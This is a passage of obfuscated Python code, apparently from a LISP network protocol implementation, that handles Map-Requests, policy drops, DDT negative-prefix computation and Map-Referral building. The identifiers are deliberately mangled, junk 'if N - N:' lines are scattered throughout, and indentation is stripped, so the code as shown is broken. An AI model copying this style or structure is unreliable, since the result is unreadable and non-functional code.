iI1IIi1I = LISP_DROP_ACTION
elif ( oOOOO0ooo . proxy_reply_action != "" ) :
iI1IIi1I = oOOOO0ooo . proxy_reply_action
Ii1 = ", forced, action {}" . format ( iI1IIi1I )
iI1IIi1I = LISP_DROP_ACTION if ( iI1IIi1I == "drop" ) else LISP_NATIVE_FORWARD_ACTION
if 82 - 82: II111iiii
if 42 - 42: I1ii11iIi11i % i11iIiiIii . iII111i
if 60 - 60: I1Ii111 % IiII - iIii1I11I1II1
if 86 - 86: I1Ii111
if 60 - 60: I1IiiI . iII111i + O0 / iIii1I11I1II1 - I1Ii111
if 32 - 32: ooOoO0o
if 9 - 9: I1Ii111
oo0OO000OooO0 = False
IiiIIIII = None
if ( oO0Oooo and lisp_policies . has_key ( oOOOO0ooo . policy ) ) :
IiI1i1i1 = lisp_policies [ oOOOO0ooo . policy ]
if ( IiI1i1i1 . match_policy_map_request ( map_request , mr_source ) ) : IiiIIIII = IiI1i1i1
if 97 - 97: i11iIiiIii / O0 . iII111i . iIii1I11I1II1
if ( IiiIIIII ) :
iI1oOoo = bold ( "matched" , False )
lprint ( "Map-Request {} policy '{}', set-action '{}'" . format ( iI1oOoo ,
IiI1i1i1 . policy_name , IiI1i1i1 . set_action ) )
else :
iI1oOoo = bold ( "no match" , False )
lprint ( "Map-Request {} for policy '{}', implied drop" . format ( iI1oOoo ,
IiI1i1i1 . policy_name ) )
oo0OO000OooO0 = True
if 40 - 40: OoOoOO00 / iII111i / O0 * ooOoO0o
if 58 - 58: iII111i % I11i
if 71 - 71: I1IiiI + OoO0O00 + IiII * I11i
if ( Ii1 != "" ) :
lprint ( "Proxy-replying for EID {}, found site '{}' EID-prefix {}{}" . format ( green ( Ii1i1 , False ) , i11I11iiiI1 , green ( iIIiIIiII111 , False ) ,
# i1IIi / OoOoOO00 + OOooOOo - oO0o
Ii1 ) )
if 54 - 54: OoO0O00 + I11i + Oo0Ooo . II111iiii / OOooOOo
OoO0oOOooOO = oOOOO0ooo . registered_rlocs
Oo0o0 = 1440
if ( oO0ooo ) :
if ( oOOOO0ooo . site_id != 0 ) :
i1I1I = map_request . source_eid
OoO0oOOooOO = lisp_get_private_rloc_set ( oOOOO0ooo , i1I1I , OOo0oOOO0 )
if 81 - 81: o0oOOo0O0Ooo * oO0o % ooOoO0o - i11iIiiIii + oO0o
if ( OoO0oOOooOO == oOOOO0ooo . registered_rlocs ) :
i1iI11i = ( oOOOO0ooo . group . is_null ( ) == False )
OOO = lisp_get_partial_rloc_set ( OoO0oOOooOO , IiiIii1I11iiIiIii , i1iI11i )
if ( OOO != OoO0oOOooOO ) :
Oo0o0 = 15
OoO0oOOooOO = OOO
if 9 - 9: OOooOOo + Oo0Ooo
if 84 - 84: i11iIiiIii . Ii1I
if 86 - 86: o0oOOo0O0Ooo / oO0o * i1IIi
if 41 - 41: II111iiii . i1IIi
if 78 - 78: I1IiiI * I11i % OOooOOo + Ii1I + OoOoOO00
if 23 - 23: iII111i / Oo0Ooo % OoooooooOO * OoooooooOO . iII111i / I1ii11iIi11i
if 30 - 30: oO0o - OoOoOO00 . I1IiiI
if 17 - 17: OoOoOO00
if ( oOOOO0ooo . force_ttl != None ) :
Oo0o0 = oOOOO0ooo . force_ttl | 0x80000000
if 76 - 76: I1ii11iIi11i - ooOoO0o % OoooooooOO / Oo0Ooo % IiII / ooOoO0o
if 57 - 57: O0
if 23 - 23: OoO0O00 / II111iiii . I1ii11iIi11i . O0
if 13 - 13: I1ii11iIi11i
if 32 - 32: OOooOOo / I11i + I1Ii111 / Oo0Ooo * OoooooooOO / II111iiii
if 8 - 8: OoO0O00
if ( IiiIIIII ) :
if ( IiiIIIII . set_record_ttl ) :
Oo0o0 = IiiIIIII . set_record_ttl
lprint ( "Policy set-record-ttl to {}" . format ( Oo0o0 ) )
if 17 - 17: iIii1I11I1II1 - Oo0Ooo
if ( IiiIIIII . set_action == "drop" ) :
lprint ( "Policy set-action drop, send negative Map-Reply" )
iI1IIi1I = LISP_POLICY_DENIED_ACTION
OoO0oOOooOO = [ ]
else :
I1II = IiiIIIII . set_policy_map_reply ( )
if ( I1II ) : OoO0oOOooOO = [ I1II ]
if 25 - 25: O0 + I1ii11iIi11i
if 53 - 53: OoooooooOO . Oo0Ooo
if 35 - 35: OOooOOo % i11iIiiIii % ooOoO0o . O0
if ( oo0OO000OooO0 ) :
lprint ( "Implied drop action, send negative Map-Reply" )
iI1IIi1I = LISP_POLICY_DENIED_ACTION
OoO0oOOooOO = [ ]
if 9 - 9: ooOoO0o + iII111i / i1IIi % Oo0Ooo - o0oOOo0O0Ooo / I1IiiI
if 42 - 42: OOooOOo + oO0o % O0 * I1ii11iIi11i + i11iIiiIii
i11 = oOOOO0ooo . echo_nonce_capable
if 16 - 16: i1IIi . I11i + OoO0O00 % Ii1I * IiII + I1IiiI
if 96 - 96: II111iiii + O0 - II111iiii
if 97 - 97: I1IiiI
if 87 - 87: I11i + iIii1I11I1II1
if ( i11Ii11I1I1II ) :
oOOooO0oo = oOOOO0ooo . eid
O00o = oOOOO0ooo . group
else :
oOOooO0oo = iiI1I1IIi
O00o = OOo0oOOO0
iI1IIi1I = LISP_AUTH_FAILURE_ACTION
OoO0oOOooOO = [ ]
if 66 - 66: i11iIiiIii % i11iIiiIii
if 38 - 38: iIii1I11I1II1
if 80 - 80: OoO0O00
if 72 - 72: I11i * II111iiii
if 82 - 82: I1Ii111 . OoO0O00 * II111iiii
if 99 - 99: iIii1I11I1II1 / iII111i % i1IIi - II111iiii / OoO0O00
packet = lisp_build_map_reply ( oOOooO0oo , O00o , OoO0oOOooOO ,
o0OOO , iI1IIi1I , Oo0o0 , map_request , None , i11 , False )
if 33 - 33: OoooooooOO / i1IIi . Ii1I
if ( I1IIiI ) :
lisp_process_pubsub ( lisp_sockets , packet , oOOooO0oo , o00O00oOO00 ,
mr_sport , o0OOO , Oo0o0 , IIiiII11i11I )
else :
lisp_send_map_reply ( lisp_sockets , packet , o00O00oOO00 , mr_sport )
if 96 - 96: OoOoOO00 / Oo0Ooo . II111iiii / ooOoO0o
if 56 - 56: IiII - ooOoO0o % oO0o / Oo0Ooo * oO0o % O0
return ( [ oOOOO0ooo . eid , oOOOO0ooo . group , LISP_DDT_ACTION_MS_ACK ] )
if 71 - 71: iII111i / II111iiii - II111iiii / I1IiiI
if 24 - 24: O0 . I1IiiI + IiII . IiII
if 53 - 53: II111iiii + Ii1I * o0oOOo0O0Ooo
if 47 - 47: Ii1I % OOooOOo . Oo0Ooo
if 94 - 94: Ii1I - iIii1I11I1II1 + I1IiiI - iIii1I11I1II1 . o0oOOo0O0Ooo
I1i1III1I1 = len ( oOOOO0ooo . registered_rlocs )
if ( I1i1III1I1 == 0 ) :
lprint ( "Requested EID {} found site '{}' with EID-prefix {} with " + "no registered RLOCs" . format ( green ( Ii1i1 , False ) , i11I11iiiI1 ,
# Ii1I
green ( iIIiIIiII111 , False ) ) )
return ( [ oOOOO0ooo . eid , oOOOO0ooo . group , LISP_DDT_ACTION_MS_ACK ] )
if 31 - 31: OoOoOO00
if 72 - 72: II111iiii + i11iIiiIii * OoO0O00 / II111iiii / I11i
if 59 - 59: OOooOOo
if 9 - 9: I1IiiI + I1IiiI / I11i - OOooOOo % iIii1I11I1II1 / I1ii11iIi11i
if 40 - 40: I1Ii111 - OOooOOo * IiII + o0oOOo0O0Ooo - I1IiiI
o00oOOoo0o = map_request . target_eid if map_request . source_eid . is_null ( ) else map_request . source_eid
if 26 - 26: IiII + OOooOOo / I1Ii111 . i1IIi
I1iI1111ii1I1 = map_request . target_eid . hash_address ( o00oOOoo0o )
I1iI1111ii1I1 %= I1i1III1I1
oo00 = oOOOO0ooo . registered_rlocs [ I1iI1111ii1I1 ]
if 52 - 52: O0 - I1Ii111 . oO0o
if ( oo00 . rloc . is_null ( ) ) :
lprint ( ( "Suppress forwarding Map-Request for EID {} at site '{}' " + "EID-prefix {}, no RLOC address" ) . format ( green ( Ii1i1 , False ) ,
# iII111i - I1ii11iIi11i * Ii1I
i11I11iiiI1 , green ( iIIiIIiII111 , False ) ) )
else :
lprint ( ( "Forwarding Map-Request for EID {} to ETR {} at site '{}' " + "EID-prefix {}" ) . format ( green ( Ii1i1 , False ) ,
# I1ii11iIi11i - I1ii11iIi11i - oO0o % I11i * OoO0O00 . i1IIi
red ( oo00 . rloc . print_address ( ) , False ) , i11I11iiiI1 ,
green ( iIIiIIiII111 , False ) ) )
if 35 - 35: I11i . IiII + ooOoO0o
if 19 - 19: O0 - i1IIi / I1Ii111
if 14 - 14: I11i - i11iIiiIii
if 49 - 49: oO0o . I1ii11iIi11i
lisp_send_ecm ( lisp_sockets , packet , map_request . source_eid , mr_sport ,
map_request . target_eid , oo00 . rloc , to_etr = True )
if 51 - 51: OOooOOo + o0oOOo0O0Ooo . OOooOOo
return ( [ oOOOO0ooo . eid , oOOOO0ooo . group , LISP_DDT_ACTION_MS_ACK ] )
if 23 - 23: iIii1I11I1II1 + OoO0O00 / I1IiiI
if 48 - 48: OoOoOO00 + I11i + oO0o . I1IiiI
if 7 - 7: iII111i * i1IIi % OoOoOO00 % Ii1I . I1IiiI
if 53 - 53: OOooOOo / I11i + OOooOOo / I1IiiI / OoO0O00
if 12 - 12: i11iIiiIii % ooOoO0o / iII111i . IiII
if 68 - 68: OOooOOo / iIii1I11I1II1 + I1IiiI . ooOoO0o * IiII
if 72 - 72: I1Ii111
def lisp_ddt_process_map_request ( lisp_sockets , map_request , ecm_source , port ) :
if 51 - 51: OoOoOO00
if 61 - 61: Oo0Ooo / i1IIi + I1Ii111 - OoooooooOO / O0
if 25 - 25: I1ii11iIi11i * i11iIiiIii / i1IIi
if 69 - 69: OOooOOo % ooOoO0o - i1IIi . Oo0Ooo
iiI1I1IIi = map_request . target_eid
OOo0oOOO0 = map_request . target_group
Ii1i1 = lisp_print_eid_tuple ( iiI1I1IIi , OOo0oOOO0 )
o0OOO = map_request . nonce
iI1IIi1I = LISP_DDT_ACTION_NULL
if 35 - 35: iIii1I11I1II1 - I11i / iIii1I11I1II1 % ooOoO0o % I1IiiI
if 46 - 46: oO0o
if 5 - 5: i1IIi % o0oOOo0O0Ooo + OoOoOO00 - I11i . Ii1I
if 33 - 33: II111iiii * o0oOOo0O0Ooo
if 8 - 8: I1ii11iIi11i % o0oOOo0O0Ooo - IiII
OooOo0OO = None
if ( lisp_i_am_ms ) :
oOOOO0ooo = lisp_site_eid_lookup ( iiI1I1IIi , OOo0oOOO0 , False )
if ( oOOOO0ooo == None ) : return
if 42 - 42: ooOoO0o - I11i * iII111i
if ( oOOOO0ooo . registered ) :
iI1IIi1I = LISP_DDT_ACTION_MS_ACK
Oo0o0 = 1440
else :
iiI1I1IIi , OOo0oOOO0 , iI1IIi1I = lisp_ms_compute_neg_prefix ( iiI1I1IIi , OOo0oOOO0 )
iI1IIi1I = LISP_DDT_ACTION_MS_NOT_REG
Oo0o0 = 1
if 39 - 39: OOooOOo - I1ii11iIi11i % IiII % I1ii11iIi11i * II111iiii - Ii1I
else :
OooOo0OO = lisp_ddt_cache_lookup ( iiI1I1IIi , OOo0oOOO0 , False )
if ( OooOo0OO == None ) :
iI1IIi1I = LISP_DDT_ACTION_NOT_AUTH
Oo0o0 = 0
lprint ( "DDT delegation entry not found for EID {}" . format ( green ( Ii1i1 , False ) ) )
if 19 - 19: I11i % OoOoOO00 / OoO0O00 % I11i + o0oOOo0O0Ooo / iII111i
elif ( OooOo0OO . is_auth_prefix ( ) ) :
if 35 - 35: ooOoO0o % I11i * I1ii11iIi11i
if 10 - 10: OoO0O00 + OoooooooOO + I1Ii111
if 57 - 57: Ii1I % Ii1I * Oo0Ooo % i11iIiiIii
if 12 - 12: oO0o . Oo0Ooo . I1IiiI - i11iIiiIii / o0oOOo0O0Ooo
iI1IIi1I = LISP_DDT_ACTION_DELEGATION_HOLE
Oo0o0 = 15
Ooo0000 = OooOo0OO . print_eid_tuple ( )
lprint ( ( "DDT delegation entry not found but auth-prefix {} " + "found for EID {}" ) . format ( Ooo0000 ,
# I1Ii111 - Ii1I . OoO0O00 - IiII
green ( Ii1i1 , False ) ) )
if 43 - 43: i11iIiiIii . oO0o
if ( OOo0oOOO0 . is_null ( ) ) :
iiI1I1IIi = lisp_ddt_compute_neg_prefix ( iiI1I1IIi , OooOo0OO ,
lisp_ddt_cache )
else :
OOo0oOOO0 = lisp_ddt_compute_neg_prefix ( OOo0oOOO0 , OooOo0OO ,
lisp_ddt_cache )
iiI1I1IIi = lisp_ddt_compute_neg_prefix ( iiI1I1IIi , OooOo0OO ,
OooOo0OO . source_cache )
if 23 - 23: ooOoO0o - OoO0O00 + oO0o . OOooOOo - I1IiiI
OooOo0OO = None
else :
Ooo0000 = OooOo0OO . print_eid_tuple ( )
lprint ( "DDT delegation entry {} found for EID {}" . format ( Ooo0000 , green ( Ii1i1 , False ) ) )
if 66 - 66: iII111i % iII111i
Oo0o0 = 1440
if 59 - 59: II111iiii . i1IIi % i1IIi
if 40 - 40: I1Ii111 . II111iiii * o0oOOo0O0Ooo + I11i - i1IIi
if 67 - 67: o0oOOo0O0Ooo - O0 - i1IIi . ooOoO0o . iII111i
if 43 - 43: II111iiii . o0oOOo0O0Ooo + i11iIiiIii . O0 / O0 . II111iiii
if 13 - 13: Ii1I % i11iIiiIii
if 3 - 3: ooOoO0o % OoOoOO00 * I1Ii111 - OoO0O00 / i1IIi % I1IiiI
IiiiIi1iiii11 = lisp_build_map_referral ( iiI1I1IIi , OOo0oOOO0 , OooOo0OO , iI1IIi1I , Oo0o0 , o0OOO )
o0OOO = map_request . nonce >> 32
if ( map_request . nonce != 0 and o0OOO != 0xdfdf0e1d ) : port = LISP_CTRL_PORT
lisp_send_map_referral ( lisp_sockets , IiiiIi1iiii11 , ecm_source , port )
return
if 50 - 50: I1ii11iIi11i + iII111i
if 64 - 64: oO0o
if 11 - 11: o0oOOo0O0Ooo
if 95 - 95: i1IIi . ooOoO0o . Oo0Ooo
if 13 - 13: OOooOOo - Oo0Ooo % O0 . I1Ii111
if 66 - 66: I1IiiI + I11i
if 58 - 58: I1ii11iIi11i
if 7 - 7: oO0o - I11i
if 59 - 59: Ii1I / o0oOOo0O0Ooo / OoO0O00 + IiII + i11iIiiIii
if 64 - 64: o0oOOo0O0Ooo * IiII * IiII * iII111i % i11iIiiIii
if 22 - 22: I1ii11iIi11i * II111iiii - OOooOOo % i11iIiiIii
if 10 - 10: OOooOOo / I1ii11iIi11i
if 21 - 21: OoO0O00 % Oo0Ooo . o0oOOo0O0Ooo + IiII
def lisp_find_negative_mask_len ( eid , entry_prefix , neg_prefix ) :
iiii1 = eid . hash_address ( entry_prefix )
IiII1II1 = eid . addr_length ( ) * 8
oO00OO0Ooo00O = 0
if 79 - 79: oO0o - IiII % OoooooooOO . ooOoO0o * I1IiiI
if 44 - 44: o0oOOo0O0Ooo
if 76 - 76: i11iIiiIii % OoO0O00
if 38 - 38: I1ii11iIi11i + II111iiii - I1ii11iIi11i
for oO00OO0Ooo00O in range ( IiII1II1 ) :
o0OoO = 1 << ( IiII1II1 - oO00OO0Ooo00O - 1 )
if ( iiii1 & o0OoO ) : break
if 58 - 58: OOooOOo * I11i . I1IiiI
if 46 - 46: I11i + II111iiii * iII111i % ooOoO0o - I1IiiI
if ( oO00OO0Ooo00O > neg_prefix . mask_len ) : neg_prefix . mask_len = oO00OO0Ooo00O
return
if 73 - 73: I1ii11iIi11i * iIii1I11I1II1 . I1Ii111 - Ii1I
if 11 - 11: I11i
if 48 - 48: IiII / O0
if 46 - 46: ooOoO0o + oO0o
if 7 - 7: ooOoO0o * oO0o . i1IIi
if 74 - 74: i1IIi * I11i + OoOoOO00 / OoO0O00 - oO0o / I11i
if 90 - 90: IiII % I1ii11iIi11i % i1IIi
if 63 - 63: Ii1I . I1IiiI + IiII / OoOoOO00 + ooOoO0o - iIii1I11I1II1
if 20 - 20: i1IIi % II111iiii . IiII % iIii1I11I1II1
if 9 - 9: o0oOOo0O0Ooo
def lisp_neg_prefix_walk ( entry , parms ) :
iiI1I1IIi , O00O00oO00 , O0I111Ii1 = parms
if 19 - 19: oO0o
if ( O00O00oO00 == None ) :
if ( entry . eid . instance_id != iiI1I1IIi . instance_id ) :
return ( [ True , parms ] )
if 18 - 18: Ii1I / OoooooooOO % i1IIi * o0oOOo0O0Ooo
if ( entry . eid . afi != iiI1I1IIi . afi ) : return ( [ True , parms ] )
else :
if ( entry . eid . is_more_specific ( O00O00oO00 ) == False ) :
return ( [ True , parms ] )
if 70 - 70: IiII % i1IIi / IiII - o0oOOo0O0Ooo . Oo0Ooo / O0
if 54 - 54: o0oOOo0O0Ooo
if 53 - 53: II111iiii / IiII . i1IIi + I1Ii111 / OoO0O00 - OoooooooOO
if 67 - 67: ooOoO0o . Ii1I - Oo0Ooo * iII111i . I11i - OOooOOo
if 10 - 10: I11i
if 37 - 37: o0oOOo0O0Ooo / I1IiiI * oO0o / II111iiii
lisp_find_negative_mask_len ( iiI1I1IIi , entry . eid , O0I111Ii1 )
return ( [ True , parms ] )
if 39 - 39: IiII - i1IIi - IiII - OoooooooOO - I1ii11iIi11i
if 66 - 66: IiII + i1IIi
if 21 - 21: IiII / i11iIiiIii / OoOoOO00
if 75 - 75: Ii1I . i1IIi / I1IiiI * iII111i . IiII / OoOoOO00
if 58 - 58: ooOoO0o + OOooOOo / ooOoO0o / i11iIiiIii
if 95 - 95: ooOoO0o
if 10 - 10: OoO0O00 % ooOoO0o * o0oOOo0O0Ooo
if 37 - 37: Ii1I . o0oOOo0O0Ooo
def lisp_ddt_compute_neg_prefix ( eid , ddt_entry , cache ) :
if 34 - 34: ooOoO0o * IiII . Ii1I + iIii1I11I1II1
if 1 - 1: i11iIiiIii + I11i
if 78 - 78: Ii1I % Oo0Ooo / OoO0O00 . iIii1I11I1II1 . II111iiii
if 67 - 67: oO0o % I1Ii111
if ( eid . is_binary ( ) == False ) : return ( eid )
if 72 - 72: I1IiiI . i11iIiiIii . OoOoOO00 + I1IiiI - I1Ii111 + iII111i
O0I111Ii1 = lisp_address ( eid . afi , "" , 0 , 0 )
O0I111Ii1 . copy_address ( eid )
O0I111Ii1 . mask_len = 0
if 15 - 15: I1IiiI
O00OO = ddt_entry . print_eid_tuple ( )
O00O00oO00 = ddt_entry . eid
if 75 - 75: O0 . I1Ii111 . Ii1I % Oo0Ooo - OOooOOo / i11iIiiIii
if 35 - 35: OoO0O00 . II111iiii + I1Ii111 + Ii1I - O0 + OoOoOO00
if 77 - 77: O0 % Ii1I - I1ii11iIi11i
if 17 - 17: OoooooooOO - OoooooooOO % I1Ii111 * Ii1I . OoooooooOO
if 51 - 51: iIii1I11I1II1 % IiII * iIii1I11I1II1 - OoO0O00 % I1IiiI + i11iIiiIii
eid , O00O00oO00 , O0I111Ii1 = cache . walk_cache ( lisp_neg_prefix_walk ,
( eid , O00O00oO00 , O0I111Ii1 ) )
if 33 - 33: I11i
if 99 - 99: I11i
if 61 - 61: i1IIi - i1IIi
if 97 - 97: I11i + II111iiii / OoooooooOO + I1ii11iIi11i * o0oOOo0O0Ooo
O0I111Ii1 . mask_address ( O0I111Ii1 . mask_len )
if 29 - 29: I1Ii111
lprint ( ( "Least specific prefix computed from ddt-cache for EID {} " + "using auth-prefix {} is {}" ) . format ( green ( eid . print_address ( ) , False ) ,
# iII111i * Oo0Ooo + I1ii11iIi11i / OoooooooOO - Ii1I % I11i
O00OO , O0I111Ii1 . print_prefix ( ) ) )
return ( O0I111Ii1 )
if 2 - 2: OoO0O00 . II111iiii
if 10 - 10: iII111i - i11iIiiIii - i11iIiiIii / ooOoO0o
if 76 - 76: IiII % OOooOOo
if 34 - 34: I1IiiI
if 56 - 56: OoooooooOO + O0 . II111iiii / i1IIi - O0 . iIii1I11I1II1
if 94 - 94: i1IIi . Oo0Ooo / o0oOOo0O0Ooo % I1Ii111 / OOooOOo + OoOoOO00
if 21 - 21: Oo0Ooo / Oo0Ooo
if 1 - 1: Oo0Ooo
def lisp_ms_compute_neg_prefix ( eid , group ) :
O0I111Ii1 = lisp_address ( eid . afi , "" , 0 , 0 )
O0I111Ii1 . copy_address ( eid )
O0I111Ii1 . mask_len = 0
O0ooOOoOoOO0 = lisp_address ( group . afi , "" , 0 , 0 )
O0ooOOoOoOO0 . copy_address ( group )
O0ooOOoOoOO0 . mask_len = 0
O00O00oO00 = None
if 80 - 80: II111iiii - I1ii11iIi11i / iIii1I11I1II1 % Oo0Ooo . Ii1I
if 33 - 33: OOooOOo + I1ii11iIi11i + I1Ii111 * I11i / OoO0O00 + o0oOOo0O0Ooo
if 46 - 46: iII111i
if 56 - 56: Oo0Ooo / II111iiii
if 61 - 61: Ii1I - i1IIi / ooOoO0o - Oo0Ooo / IiII % Oo0Ooo
if ( group . is_null ( ) ) :
OooOo0OO = lisp_ddt_cache . lookup_cache ( eid , False )
if ( OooOo0OO == None ) :
O0I111Ii1 . mask_len = O0I111Ii1 . host_mask_len ( )
O0ooOOoOoOO0 . mask_len = O0ooOOoOoOO0 . host_mask_len ( )
return ( [ O0I111Ii1 , O0ooOOoOoOO0 , LISP_DDT_ACTION_NOT_AUTH ] )
if 53 - 53: OoooooooOO + iII111i % II111iiii * IiII
iI1Ii1i1IIi = lisp_sites_by_eid
if ( OooOo0OO . is_auth_prefix ( ) ) : O00O00oO00 = OooOo0OO . eid
else :
OooOo0OO = lisp_ddt_cache . lookup_cache ( group , False )
if ( OooOo0OO == None ) :
O0I111Ii1 . mask_len = O0I111Ii1 . host_mask_len ( )
O0ooOOoOoOO0 . mask_len = O0ooOOoOoOO0 . host_mask_len ( )
return ( [ O0I111Ii1 , O0ooOOoOoOO0 , LISP_DDT_ACTION_NOT_AUTH ] )
if 59 - 59: OoO0O00 - oO0o - Ii1I + ooOoO0o
if ( OooOo0OO . is_auth_prefix ( ) ) : O00O00oO00 = OooOo0OO . group
if 34 - 34: oO0o + I1Ii111 . OOooOOo
group , O00O00oO00 , O0ooOOoOoOO0 = lisp_sites_by_eid . walk_cache ( lisp_neg_prefix_walk , ( group , O00O00oO00 , O0ooOOoOoOO0 ) )
if 78 - 78: i1IIi + IiII
if 55 - 55: I1Ii111 - I11i - iIii1I11I1II1 / ooOoO0o % oO0o / II111iiii
O0ooOOoOoOO0 . mask_address ( O0ooOOoOoOO0 . mask_len )
if 22 - 22: OoooooooOO % OOooOOo . OOooOOo
lprint ( ( "Least specific prefix computed from site-cache for " + "group EID {} using auth-prefix {} is {}" ) . format ( group . print_address ( ) , O00O00oO00 . print_prefix ( ) if ( O00O00oO00 != None ) else "'not found'" ,
# iII111i - OoO0O00 % I1ii11iIi11i * Oo0Ooo
# OoO0O00 / O0 / o0oOOo0O0Ooo . I1IiiI
# OoO0O00 * iIii1I11I1II1 * I1IiiI . OoooooooOO + I1ii11iIi11i % iIii1I11I1II1
O0ooOOoOoOO0 . print_prefix ( ) ) )
if 78 - 78: OoOoOO00 . oO0o - Oo0Ooo - II111iiii - I1ii11iIi11i * oO0o
iI1Ii1i1IIi = OooOo0OO . source_cache
if 41 - 41: I11i / ooOoO0o + IiII % OoooooooOO
if 72 - 72: Ii1I
if 22 - 22: o0oOOo0O0Ooo / OoO0O00 + OoOoOO00 + Ii1I . II111iiii * I11i
if 85 - 85: i11iIiiIii / I11i
if 28 - 28: i11iIiiIii + IiII / I11i . Ii1I / OoO0O00
iI1IIi1I = LISP_DDT_ACTION_DELEGATION_HOLE if ( O00O00oO00 != None ) else LISP_DDT_ACTION_NOT_AUTH
if 100 - 100: o0oOOo0O0Ooo - I11i . o0oOOo0O0Ooo
if 90 - 90: OoOoOO00 / II111iiii / I11i * I11i - iIii1I11I1II1
if 87 - 87: IiII
if 92 - 92: OoO0O00 / IiII - ooOoO0o
if 45 - 45: iII111i - I11i * ooOoO0o * OOooOOo / I1Ii111 * iII111i
if 33 - 33: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo % iIii1I11I1II1 + I11i / i11iIiiIii
eid , O00O00oO00 , O0I111Ii1 = iI1Ii1i1IIi . walk_cache ( lisp_neg_prefix_walk ,
( eid , O00O00oO00 , O0I111Ii1 ) )
if 64 - 64: I11i * ooOoO0o / OoooooooOO
if 38 - 38: iIii1I11I1II1 . OoO0O00 * OoOoOO00 + OoOoOO00 + ooOoO0o
if 44 - 44: I1ii11iIi11i * OOooOOo % OoO0O00 . I1IiiI % Ii1I + II111iiii
if 100 - 100: oO0o - II111iiii . o0oOOo0O0Ooo
O0I111Ii1 . mask_address ( O0I111Ii1 . mask_len )
if 63 - 63: OoOoOO00 % IiII . iII111i
lprint ( ( "Least specific prefix computed from site-cache for EID {} " + "using auth-prefix {} is {}" ) . format ( green ( eid . print_address ( ) , False ) ,
# I1IiiI . O0 / oO0o
# I1IiiI - OoO0O00 / iIii1I11I1II1 * iII111i + OoOoOO00 + IiII
O00O00oO00 . print_prefix ( ) if ( O00O00oO00 != None ) else "'not found'" , O0I111Ii1 . print_prefix ( ) ) )
if 16 - 16: OoO0O00 % OOooOOo . I11i . I11i
if 4 - 4: O0 + I11i / OoOoOO00 * iIii1I11I1II1 . Ii1I
return ( [ O0I111Ii1 , O0ooOOoOoOO0 , iI1IIi1I ] )
if 68 - 68: Oo0Ooo % ooOoO0o + i11iIiiIii / oO0o / II111iiii
if 63 - 63: OoO0O00 % i1IIi - OoooooooOO / ooOoO0o
if 75 - 75: OOooOOo + IiII + ooOoO0o / I1IiiI . iIii1I11I1II1 / Oo0Ooo
if 81 - 81: I1Ii111 % II111iiii - Oo0Ooo / I1IiiI + i11iIiiIii . I11i
if 67 - 67: ooOoO0o . I1Ii111 . Oo0Ooo . Ii1I + iIii1I11I1II1 / OoooooooOO
if 93 - 93: ooOoO0o * OoO0O00 - I1Ii111 / I1ii11iIi11i
if 60 - 60: OoO0O00 / oO0o . I1IiiI + OoOoOO00 + I1ii11iIi11i % Ii1I
if 70 - 70: i1IIi * II111iiii * I1IiiI
def lisp_ms_send_map_referral ( lisp_sockets , map_request , ecm_source , port ,
action , eid_prefix , group_prefix ) :
if 7 - 7: OoooooooOO + II111iiii % o0oOOo0O0Ooo * O0 . OoO0O00 * OoooooooOO
iiI1I1IIi = map_request . target_eid
OOo0oOOO0 = map_request . target_group
o0OOO = map_request . nonce
if 20 - 20: Oo0Ooo % OOooOOo
if ( action == LISP_DDT_ACTION_MS_ACK ) : Oo0o0 = 1440
if 8 - 8: OOooOOo
if 92 - 92: iII111i / OOooOOo . IiII / I11i + o0oOOo0O0Ooo
if 99 - 99: II111iiii
if 70 - 70: O0 % I1ii11iIi11i
iIi11iI = lisp_map_referral ( )
iIi11iI . record_count = 1
iIi11iI . nonce = o0OOO
IiiiIi1iiii11 = iIi11iI . encode ( )
iIi11iI . print_map_referral ( )
if 28 - 28: IiII - i1IIi - I1Ii111 % Ii1I - IiII
Oo00OoooO0o = False
if 73 - 73: iIii1I11I1II1 . iIii1I11I1II1 + oO0o % i11iIiiIii . IiII
if 33 - 33: IiII - OOooOOo / i11iIiiIii * iIii1I11I1II1
if 2 - 2: i11iIiiIii % ooOoO0o
if 56 - 56: IiII % ooOoO0o + I1IiiI % I11i - OOooOOo
if 82 - 82: OoooooooOO . i1IIi . OoO0O00 . OoO0O00
if 31 - 31: iIii1I11I1II1
if ( action == LISP_DDT_ACTION_SITE_NOT_FOUND ) :
eid_prefix , group_prefix , action = lisp_ms_compute_neg_prefix ( iiI1I1IIi ,
OOo0oOOO0 )
Oo0o0 = 15
if 64 - 64: ooOoO0o
if ( action == LISP_DDT_ACTION_MS_NOT_REG ) : Oo0o0 = 1
if ( action == LISP_DDT_ACTION_MS_ACK ) : Oo0o0 = 1440
if ( action == LISP_DDT_ACTION_DELEGATION_HOLE ) : Oo0o0 = 15
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : Oo0o0 = 0
if 30 - 30: OoO0O00 + o0oOOo0O0Ooo / iIii1I11I1II1
O0OoO0O0 = False
I1i1III1I1 = 0
OooOo0OO = lisp_ddt_cache_lookup ( iiI1I1IIi , OOo0oOOO0 , False )
if ( OooOo0OO != None ) :
I1i1III1I1 = len ( OooOo0OO . delegation_set )
O0OoO0O0 = OooOo0OO . is_ms_peer_entry ( )
OooOo0OO . map_referrals_sent += 1
if 79 - 79: I11i * I1ii11iIi11i
if 85 - 85: iIii1I11I1II1 * O0 / iII111i
if 75 - 75: Oo0Ooo * IiII % Ii1I
if 40 - 40: o0oOOo0O0Ooo * i11iIiiIii . ooOoO0o
if 63 - 63: I1Ii111 / Ii1I - iIii1I11I1II1 / i11iIiiIii / IiII + I11i
if ( action == LISP_DDT_ACTION_NOT_AUTH ) : Oo00OoooO0o = True
if ( action in ( LISP_DDT_ACTION_MS_REFERRAL , LISP_DDT_ACTION_MS_ACK ) ) :
Oo00OoooO0o = ( O0OoO0O0 == False )
if 57 - 57: iIii1I11I1II1 % iIii1I11I1II1
if 23 - 23: II111iiii . ooOoO0o % I1Ii111
if 39 - 39: OoooooooOO
if 10 - 10: Oo0Ooo * iII111i
if 78 - 78: Oo0Ooo / i11iIiiIii - I1IiiI
oO000oOoO0 = lisp_eid_record ( )
oO000oOoO0 . rloc_count = I1i1III1I1
oO000oOoO0 . authoritative = True
oO000oOoO0 . action = action
oO000oOoO0 . ddt_incomplete = Oo00OoooO0o
oO000oOoO0 . eid = eid_prefix
oO000oOoO0 . group = group_prefix
oO000oOoO0 . record_ttl = Oo0o0
if 51 - 51: ooOoO0o / Oo0Ooo - I1Ii111 - iII111i
IiiiIi1iiii11 += oO000oOoO0 . encode ( )
oO000oOoO0 . print_record ( " " , True )
if 68 - 68: I1ii11iIi11i - iIii1I11I1II1 * OoooooooOO
